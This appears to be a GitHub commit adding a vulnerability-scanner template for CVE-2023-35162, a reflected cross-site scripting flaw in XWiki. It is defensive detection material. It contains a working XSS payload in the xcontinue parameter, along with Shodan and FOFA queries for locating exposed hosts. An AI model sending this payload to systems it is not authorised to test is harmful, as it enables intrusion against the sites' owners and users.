Create CVE-2023-35162.yaml

patch-4
Ritik Chaddha 2024-06-06 15:29:33 +05:30 committed by GitHub
parent 5daab66ae6
commit 0068d262a6
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 44 additions and 0 deletions

View File

@ -0,0 +1,44 @@
id: CVE-2023-35162
info:
name: XWiki < 14.10.5 - Cross-Site Scripting
author: ritikchaddha
severity: medium
description: |
XWiki Platform is vulnerable to reflected XSS via the previewactions template. An attacker can inject JavaScript through the xcontinue parameter.
impact: |
Successful exploitation could lead to unauthorized access or data theft.
remediation: |
Apply the latest patches provided by XWiki to mitigate the vulnerability.
reference:
- https://jira.xwiki.org/browse/XWIKI-20342
- https://github.com/xwiki/xwiki-platform/blob/244dbbaa0738a0c40b19929c0369c8b62ae5236e/xwiki-platform-core/xwiki-platform-flamingo/xwiki-platform-flamingo-skin/xwiki-platform-flamingo-skin-resources/src/main/resources/flamingo/previewactions.vm#L48
- https://nvd.nist.gov/vuln/detail/CVE-2023-35162
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-35162
cwe-id: CWE-79
epss-score: 0.00127
epss-percentile: 0.46778
cpe: cpe:2.3:a:xwiki:xwiki:*:*:*:*:*:*:*:*
metadata:
vendor: xwiki
product: xwiki
shodan-query: "XWiki"
fofa-query: body="data-xwiki-reference"
tags: cve,cve2023,xwiki,xss
http:
- method: GET
path:
- "{{BaseURL}}/xwiki/bin/get/FlamingoThemes/Cerulean?xpage=xpart&vm=previewactions.vm&xcontinue=javascript:alert(document.domain)"
matchers:
- type: dsl
dsl:
- 'contains(body, "name=\"xcontinue\" value=\"javascript:alert(document.domain)")'
- 'contains(body, "Back To Edit")'
- 'contains(header, "text/html")'
- 'status_code == 200'
condition: and